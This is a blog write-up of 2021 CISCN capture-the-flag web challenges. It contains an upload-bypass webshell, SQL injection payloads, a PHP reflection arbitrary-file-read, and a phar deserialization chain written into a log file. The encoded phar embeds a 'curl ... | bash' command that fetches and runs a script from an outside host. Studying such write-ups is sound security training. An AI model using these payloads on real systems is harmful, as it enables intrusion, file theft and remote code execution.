HacKerQWQ's Blog

2021 CISCN Web Summary

Word count: 4.2k | Reading time: 24 min
2021/05/16

Preface

Just a plain record of the knowledge points that were tested.

WEB

upload

Knowledge points

  • File upload bypass
  • Unicode spoofing

Solving

Two source files sit in the same directory, index.php and example.php (the second one has to be found by directory scanning). index.php:

```php
<?php
// index.php: the upload endpoint (challenge code, kept as given; comments added)
if (!isset($_GET["ctf"])) {
    highlight_file(__FILE__);
    die();
}

if(isset($_GET["ctf"]))
    $ctf = $_GET["ctf"];

if($ctf=="upload") {
    // Size limit: 512 KiB
    if ($_FILES['postedFile']['size'] > 1024*512) {
        die("Something this big, are you trying to DoS me?");
    }
    // Must be recognised by getimagesize(); XBM is tried last, by scanning the
    // whole file for "#define ... width" / "#define ... height" lines
    $imageinfo = getimagesize($_FILES['postedFile']['tmp_name']);
    if ($imageinfo === FALSE) {
        die("If you can't upload a proper image, don't bother me");
    }
    // Dies only when BOTH dimensions differ from 1, so one side of length 1 is enough
    if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) {
        die("Things that aren't nice and square are annoying");
    }
    // Byte-wise, ASCII case-insensitive blacklist on the URL-decoded original filename
    $fileName=urldecode($_FILES['postedFile']['name']);
    if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) {
        die("Letting you upload some things would be a disaster");
    }
    // Multibyte lowercasing happens AFTER the blacklist check
    $imagePath = "image/" . mb_strtolower($fileName);
    if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) {
        echo "upload success, image at $imagePath";
    } else {
        die("Upload failed");
    }
}
```

example.php:

```php
<?php
// example.php: unzips an archive and re-encodes every extracted PNG
// (challenge code, kept as given; comments added)
if (!isset($_GET["ctf"])) {
    highlight_file(__FILE__);
    die();
}

if(isset($_GET["ctf"]))
    $ctf = $_GET["ctf"];

if($ctf=="poc") {
    $zip = new \ZipArchive();
    // No traversal check: POST file=../image/exp.zip reaches the upload directory
    $name_for_zip = "example/" . $_POST["file"];
    // Only the text after the last dot is checked
    if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") {
        die("Shall we take another look?");
    }
    if ($zip->open($name_for_zip) !== TRUE) {
        die ("Can't even unzip it");
    }

    echo "It unzips, let me think about where to put it";
    $pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]);
    $zip->extractTo($pos_for_zip);
    $zip->close();
    unlink($name_for_zip);
    $files = glob("$pos_for_zip/*");
    foreach($files as $file){
        if (is_dir($file)) {
            continue;
        }
        // Each file is loaded as PNG, cropped square and written back under example/
        // with its original basename, so an embedded payload has to survive GD's
        // decode/re-encode round trip
        $first = imagecreatefrompng($file);
        $size = min(imagesx($first), imagesy($first));
        $second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]);
        if ($second !== FALSE) {
            $final_name = pathinfo($file)["basename"];
            imagepng($second, 'example/'.$final_name);
            imagedestroy($second);
        }
        imagedestroy($first);
        unlink($file);
    }

}
```

Approach:

  1. Generate an image webshell shell.php, zip it, and replace the letter i in the archive's filename with U+0130 (İ)
  2. Have example.php extract the archive from the upload directory by traversing into ../image/

Knowledge point analysis

  1. getimagesize() can be satisfied with the following substitute:

    #define width 1
    #define height 1

    Append the two lines to the end of exp.zip; the width and height values can be chosen freely. PHP tries the XBM format last, by scanning the file line by line for "#define ... width" and "#define ... height", so the trailer is found even behind a zip archive, and zip readers still locate the end-of-central-directory record because they search for it from the end of the file.

  2. Unicode substitution: stristr() compares bytes, so the blacklist c/i/h/ph never matches the two-byte UTF-8 encoding of İ; the later mb_strtolower() maps U+0130 back to a plain i, which yields exp.zip again. This relies on the simple case mapping that mb_strtolower() used before PHP 7.3; from PHP 7.3 on, full case mapping lowercases U+0130 to i followed by the combining dot U+0307, so check the target's PHP version.
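The two tricks above, as an added example that is not part of the original writeup: it builds the zip-plus-XBM-trailer polyglot, re-implements the index.php checks (getimagesize()'s XBM scan, the stristr() blacklist, mb_strtolower()) and example.php's extension check in Python, and runs the polyglot and the filename exp.zİp through them. The inner file name and contents (shell.php) and the archive name are placeholders; the real image webshell must survive GD's PNG re-encoding, which the placeholder does not attempt. The mb_strtolower() model only handles U+0130 and shows both the pre-7.3 simple mapping and the full mapping (which is what Python's str.lower() does).

```python
"""Added example: zip/XBM polyglot plus models of the upload checks."""
import io
import re
import zipfile

# getimagesize() tries XBM last and scans the whole file for
# "#define <name> <int>" lines whose name (after the last '_') is width/height.
XBM_TRAILER = b"\n#define width 1\n#define height 1\n"

# Constructed placeholder for the image webshell inside the archive (assumed name).
INNER_NAME = "shell.php"
INNER_DATA = b"\x89PNG-placeholder <?php @eval($_POST['cmd']); ?>"

# Blacklist from index.php; stristr() is byte-based and ASCII case-insensitive
BLACKLIST = (b"c", b"i", b"h", b"ph")


def build_polyglot_zip(inner_name: str, inner_data: bytes) -> bytes:
    """Zip the payload and append the XBM trailer. Zip readers find the
    end-of-central-directory record by scanning backwards from the end,
    so trailing data does not break the archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, inner_data)
    return buf.getvalue() + XBM_TRAILER


def xbm_size(data: bytes):
    """Model of PHP's php_get_xbm(): returns (width, height) or None."""
    width = height = 0
    for line in data.split(b"\n"):
        m = re.match(rb"#define (\S+) (-?\d+)", line)
        if not m:
            continue
        key = m.group(1).rsplit(b"_", 1)[-1]
        if key == b"width":
            width = int(m.group(2))
        elif key == b"height":
            height = int(m.group(2))
        if width and height:
            return (width, height)
    return None


def passes_dimension_check(size) -> bool:
    """index.php dies only when BOTH dimensions differ from 1."""
    return size is not None and (size[0] == 1 or size[1] == 1)


def passes_name_filter(name: str) -> bool:
    """bytes.lower() folds ASCII only, like stristr(); the UTF-8 encoding of
    U+0130 (c4 b0) never contains an ASCII 'i'."""
    raw = name.encode("utf-8").lower()
    return not any(bad in raw for bad in BLACKLIST)


def php_mb_strtolower(name: str, full_case_mapping: bool) -> str:
    """Model of mb_strtolower(). Simple mapping (PHP < 7.3): U+0130 -> 'i'.
    Full mapping (PHP >= 7.3, same as str.lower()): U+0130 -> 'i' + U+0307.
    Only U+0130 is modelled; everything else goes through str.lower()."""
    if full_case_mapping:
        return name.lower()
    return "".join("i" if ch == "\u0130" else ch.lower() for ch in name)


def example_accepts(post_file: str) -> bool:
    """example.php only checks the text after the last dot of 'example/' + file."""
    return ("example/" + post_file).split(".")[-1] == "zip"


def run_upload_chain(uploaded_name: str, php_full_case_mapping: bool = False) -> dict:
    """Walk the polyglot through index.php's checks and example.php's name check."""
    poly = build_polyglot_zip(INNER_NAME, INNER_DATA)
    with zipfile.ZipFile(io.BytesIO(poly)) as zf:
        still_an_archive = zf.read(INNER_NAME) == INNER_DATA
    size = xbm_size(poly)
    stored = "image/" + php_mb_strtolower(uploaded_name, php_full_case_mapping)
    return {
        "still_an_archive": still_an_archive,
        "xbm_size": size,
        "dimension_ok": passes_dimension_check(size),
        "name_ok": passes_name_filter(uploaded_name),
        "stored_as": stored,
        "example_ok": example_accepts("../" + stored),   # POST file=../image/<name>
    }


if __name__ == "__main__":
    for full in (False, True):
        label = "full case mapping" if full else "simple case mapping"
        print(label, run_upload_chain("exp.z\u0130p", full))
```

With the simple mapping the archive is stored as image/exp.zip and example.php accepts ../image/exp.zip; with full case mapping it is stored as image/exp.zi̇p and the extension check fails, which is the version dependency worth confirming before relying on the trick.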

easysql

Knowledge points

  1. Injection without column names

Solving

  1. Error-based injection with updatexml()
  2. select (1,1,1)>(select * from users) to determine the column count, then join ... using to determine the column names
  3. select ? from ?

Knowledge point analysis

Reference links:
https://y4er.com/post/no-column-name-injection/

https://www.freesion.com/article/4322842637/#join__usingxx_66

There are three approaches: order by, subquery, and join ... using.

  1. order by
    Take the third column as an example; the payload is

    select * from users where id=1 union select 1,2,'p' order by 3

    The result set is now sorted on the third column, so the injected row lands before or after the real row depending on whether 'p' is smaller or larger than the real value ('b'<'c' is true, 'b'>'c' is false). Watching which row comes first lets you recover the column's contents character by character without ever knowing its name.
  2. subquery
    The idea is to rename the columns. First use a series of (select 1)a,(select 2)b,... to find out the column count, then union the target table onto those dummy rows: the result takes its column names (1, 2, ...) from the first select, so the real columns can now be addressed by number and their data read out (in the original screenshot, adminpass was the column read this way).

payload:

```sql
?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x
```

This payload directly reads every value in the second column of the this_1s_th3_fiag_tab13 table: the four dummy subqueries give the derived table x columns named 1 to 4, and MySQL accepts x.2 unquoted as a reference to the column named 2.

3. join ... using
Get the first column name:

```sql
?id=-1' union all select * from (select * from users as a join users as b)as c--+
```

Get the second and subsequent column names:

```sql
?id=-1' union all select*from (select * from users as a join users b using(id,username))c--+

?id=-1' union all select*from (select * from users as a join users b using(id,username,password))c--+
```

This works because a derived table may not contain two columns with the same name: the self-join makes MySQL fail with "Duplicate column name '<name>'", which leaks the first column. Listing the known columns in using() merges them, so the error moves on to the next unknown column, and once every column is named the error disappears.

In SQL, as is mainly used to give an alias; it can normally be omitted, but keeping it is recommended for readability.
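The column-count probe, the ORDER BY oracle and the subquery-alias trick, as an added example that is not part of the original writeup. It runs against an in-memory SQLite database with constructed tables (users with id/username/password, and a hypothetical flags table standing in for this_1s_th3_fiag_tab13) through a model of the injectable ?id= endpoint. Two portability notes: SQLite needs the renumbered column quoted (x."2", where MySQL accepts x.2), and the join ... using trick is left out because it depends on MySQL's Duplicate column name error, which SQLite does not raise. The ORDER BY oracle appends ,2 as a tie-break so that an exact match puts the injected row first, and the search assumes the target value is printable ASCII.

```python
"""Added example: no-column-name extraction techniques against SQLite."""
import sqlite3

# Constructed sample data; table and column names are assumptions.
SETUP = [
    "CREATE TABLE users (id INTEGER, username TEXT, password TEXT)",
    "INSERT INTO users VALUES (1, 'admin', 'S3cr3t!'), (2, 'guest', 'guest')",
    "CREATE TABLE flags (id INTEGER, flag TEXT)",
    "INSERT INTO flags VALUES (1, 'flag{example}')",
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    for stmt in SETUP:
        db.execute(stmt)
    return db


def vulnerable_query(db, id_param: str):
    """Model of the injectable endpoint: ?id= is concatenated into the SQL."""
    return db.execute("SELECT * FROM users WHERE id=" + id_param).fetchall()


def count_columns(db, table: str, max_cols: int = 10) -> int:
    """(1,1,...) > (select * from t) is an error unless the tuple width matches
    the table's column count (MySQL: 'Operand should contain N column(s)';
    SQLite: 'row value misused' / 'sub-select returns N columns')."""
    for n in range(1, max_cols + 1):
        probe = "(" + ",".join(["1"] * n) + ")"
        try:
            vulnerable_query(db, f"1 AND {probe} > (SELECT * FROM {table})")
            return n
        except sqlite3.OperationalError:
            continue
    raise ValueError("column count not found")


def injected_row_sorts_after(db, guess: str) -> bool:
    """ORDER BY 3 sorts the real id=1 row and the injected (1,2,guess) row by
    the third column, so the injected row comes last iff guess > real value.
    ',2' breaks ties: on an exact match the injected row (integer 2 sorts
    before the text username in SQLite) comes first, i.e. 'not greater'."""
    escaped = guess.replace("'", "''")
    rows = vulnerable_query(db, f"1 UNION SELECT 1,2,'{escaped}' ORDER BY 3,2")
    return rows[0][1] != 2


def extract_by_order_by(db) -> str:
    """Recover the third column of the id=1 row without knowing its name,
    one character at a time (printable ASCII assumed)."""
    known = ""
    while True:
        if injected_row_sorts_after(db, known + " "):
            return known                 # known == real value already
        lo, hi = 33, 127                 # smallest c with known+chr(c) > real
        while lo < hi:
            mid = (lo + hi) // 2
            if injected_row_sorts_after(db, known + chr(mid)):
                hi = mid
            else:
                lo = mid + 1
        known += chr(lo - 1)             # the real character is one below it


def read_column_by_position(db, table: str, ncols: int, position: int):
    """Subquery-alias trick: union the target table onto dummy single-column
    subqueries so the derived table's columns are named 1..ncols, then select
    by number. The dummy row (value == position) comes back as well."""
    dummies = ",".join(f"(SELECT {i}){chr(96 + i)}" for i in range(1, ncols + 1))
    inner = f"SELECT * FROM {dummies} UNION SELECT * FROM {table}"
    payload = f'-1 UNION SELECT 1,2,x."{position}" FROM ({inner})x'
    return [row[2] for row in vulnerable_query(db, payload)]


if __name__ == "__main__":
    db = make_db()
    print("users has", count_columns(db, "users"), "columns")
    print("third column of id=1:", extract_by_order_by(db))
    print("second column of flags:", read_column_by_position(db, "flags", 2, 2))
```

Each ORDER BY probe costs one request, so the binary search needs about seven probes per character; the real challenge additionally needed the updatexml() error channel to carry the output, which this model replaces with a direct view of the result rows.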

easysouce

Knowledge points

  1. Exploiting PHP reflection classes

Solving

The challenge source. $rc, $ra, $rb and $rd all come from the query string, so the attacker chooses which class is instantiated with which two arguments, and which method is then called on the object:
```php
<?php
// easysouce challenge source (kept as given; comments added)
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }

}

// Class name, both constructor arguments and the method name are attacker-controlled
$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);   // instantiate any loaded class with two arguments
var_dump($method->$rd());     // call any zero-argument method on the result
```

payload:

```
?rc=ReflectionMethod&ra=User&rb=q&rd=__toString
?rc=SplFileObject&ra=index.php&rb=r&rd=fpassthru
```

The first request builds new ReflectionMethod("User", "q") and calls __toString(), which prints the method's declaration together with its file path, line range and doc comment, so anything hidden in that comment is disclosed. The second builds new SplFileObject("index.php", "r") and calls fpassthru(), which streams the whole file into the response: an arbitrary file read for any path the web server user can open.

Knowledge point analysis

Look up the reflection classes and their methods here: https://www.php.net/manual/zh/book.reflection.php

filter

Knowledge points

  • A new Yii deserialization chain
  • Writing a phar into the log file through php://filter

Reference links

Clear the log file
```http
GET /?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Add a prefix

```http
GET /?file=AA HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Write the phar

The value is base64(phar) converted to UTF-16LE and then quoted-printable encoded with every byte escaped (=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00 is "PD9waHAg", the base64 of "<?php "):

```http
GET /?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=35=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=44=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=51=00=32=00=39=00=6B=00=5A=00=57=00=4E=00=6C=00=63=00=48=00=52=00=70=00=62=00=32=00=35=00=63=00=52=00=58=00=68=00=30=00=5A=00=57=00=35=00=7A=00=61=00=57=00=39=00=75=00=58=00=46=00=4A=00=31=00=62=00=6C=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4D=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=44=00=4D=00=36=00=49=00=67=00=42=00=44=00=62=00=32=00=52=00=6C=00=59=00=32=00=56=00=77=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=46=00=65=00=48=00=52=00=6C=00=62=00=6E=00=4E=00=70=00=62=00=32=00=35=00=63=00=55=00=6E=00=56=00=75=00=55=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=77=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=5A=00=58=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=41=00=36=00=49=00=6B=00=5A=00=68=00=61=00=32=00=56=00=79=00=58=00=46=00=5A=00=68=00=62=00=47=00=6C=00=6B=00=52=00=32=00=56=00=75=00=5A=00=58=00=4A=00=68=00=64=00=47=00=39=00=79=00=49=00=6A=00=6F=00=7A=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=79=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6E=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6B=00=5A=00=68=00=61=00=32=00=56=00=79=00=58=00=45=00=52=00=6C=00=5A=00=6D=00=46=00=31=00=62=00=48=00=52=00=48=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=52=00=6C=00=5A=00=6D=00=46=00=31=00=62=00=48=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=44=00=45=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6D=00=77=00=67=00=61=00=48=00=52=00=30=00=63=00=44=00=6F=00=76=00=4C=00=7A=00=45=00=7A=00=4F=00=53=00=34=00=79=00=4D=00=6A=00=51=00=75=00=4D=00=6A=00=51=00=33=00=4C=00=6A=00=45=00=77=00=4E=00=53=00=39=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=48=00=78=00=69=00=59=00=58=00=4E=00=6F=00=49=00=6A=00=74=00=39=00=63=00=7A=00=6F=00=78=00=4D=00=6A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=64=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=39=00=79=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=57=00=46=00=34=00=55=00=6D=00=56=00=30=00=63=00=6D=00=6C=00=6C=00=63=00=79=00=49=00=37=00=61=00=54=00=6F=00=35=00=4F=00=54=00=6B=00=35=00=4F=00=54=00=6B=00=35=00=4F=00=54=00=74=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=50=00=35=00=61=00=6A=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=32=00=79=00=35=00=71=00=4F=00=37=00=78=00=63=00=53=00=72=00=4F=00=2B=00=78=00=4E=00=56=00=43=00=52=00=48=00=4B=00=67=00=70=00=7A=00=57=00=4F=00=33=00=39=00=4D=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00a HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Clean up the stray characters

The reverse chain (quoted-printable decode, UTF-16LE to UTF-8, base64 decode) is pointed at the log through php://filter/write=, turning the logged payload back into the raw phar bytes:

```http
GET /?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Phar deserialization

Once the log holds a valid phar, opening it through the phar:// wrapper parses the archive and unserializes its metadata, which fires the Yii chain:

```http
GET /?file=phar:///var/www/html/basic/runtime/logs/app.log HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

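The encoding behind the "write the phar" request and the cleanup chain, as an added example that is not part of the original writeup. The request's value starts with =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00, which is "PD9waHAg" in UTF-16LE written as quoted-printable with every byte escaped, and PD9waHAg is base64 for "<?php ". So the attacker sent base64(phar) -> UTF-16LE -> quoted-printable, and the later request points a php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode chain at app.log to reverse it. encode_for_log() reproduces that encoding and decode_chain() models the three filters; the phar bytes are a constructed placeholder (a real one is produced with PHP's Phar class). PHP's convert.base64-decode skips bytes outside the base64 alphabet and the model does the same, which is why surrounding log text of even length is harmless while a single stray byte in front of the payload breaks the UTF-16 pairing; the writeup's prefix request is presumably there to fix that alignment, an inference the writeup itself does not spell out.

```python
"""Added example: the base64 -> UTF-16LE -> quoted-printable encoding used in
the 'write the phar' request, and a model of the three-filter decode chain."""
import base64
import binascii
import quopri
import re

# Constructed placeholder for the phar bytes (a real one comes from PHP's Phar class).
PAYLOAD = b"<?php __HALT_COMPILER(); ?>\r\n" + bytes(range(256))

NOT_B64 = re.compile(rb"[^A-Za-z0-9+/=]")


def encode_for_log(payload: bytes) -> str:
    """base64, then UTF-16LE, then quoted-printable with every byte escaped.
    Escaping all bytes keeps the value pure ASCII, so it survives the URL
    and the log line unchanged."""
    b64 = base64.b64encode(payload).decode("ascii")
    return "".join(f"={b:02X}" for b in b64.encode("utf-16-le"))


def decode_chain(log_bytes: bytes):
    """Model of php://filter/write=convert.quoted-printable-decode
    |convert.iconv.utf-16le.utf-8|convert.base64-decode. Undecodable UTF-16
    units are replaced (and then dropped as non-base64); bytes outside the
    base64 alphabet are skipped like PHP's filter does. Returns None when
    the base64 padding ends up broken."""
    step1 = quopri.decodestring(log_bytes)                               # QP decode
    step2 = step1.decode("utf-16-le", errors="replace").encode("utf-8")  # iconv
    try:
        return base64.b64decode(NOT_B64.sub(b"", step2))                 # base64 decode
    except binascii.Error:
        return None


def shift_breaks_alignment(payload: bytes) -> bool:
    """One stray byte before the encoded payload pairs the UTF-16 units wrong,
    so the chain no longer yields the payload."""
    encoded = encode_for_log(payload).encode("ascii")
    return decode_chain(encoded) == payload and decode_chain(b"X" + encoded) != payload


if __name__ == "__main__":
    print(encode_for_log(b"<?php "))
    print(decode_chain(encode_for_log(PAYLOAD).encode("ascii")) == PAYLOAD)
    print(shift_breaks_alignment(PAYLOAD))
```

Any even-length run of plain log text in front of the payload decodes to UTF-16 code units outside ASCII, whose UTF-8 bytes are all discarded by the base64 step, so the phar survives; an odd-length prefix shifts every pair and destroys it.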
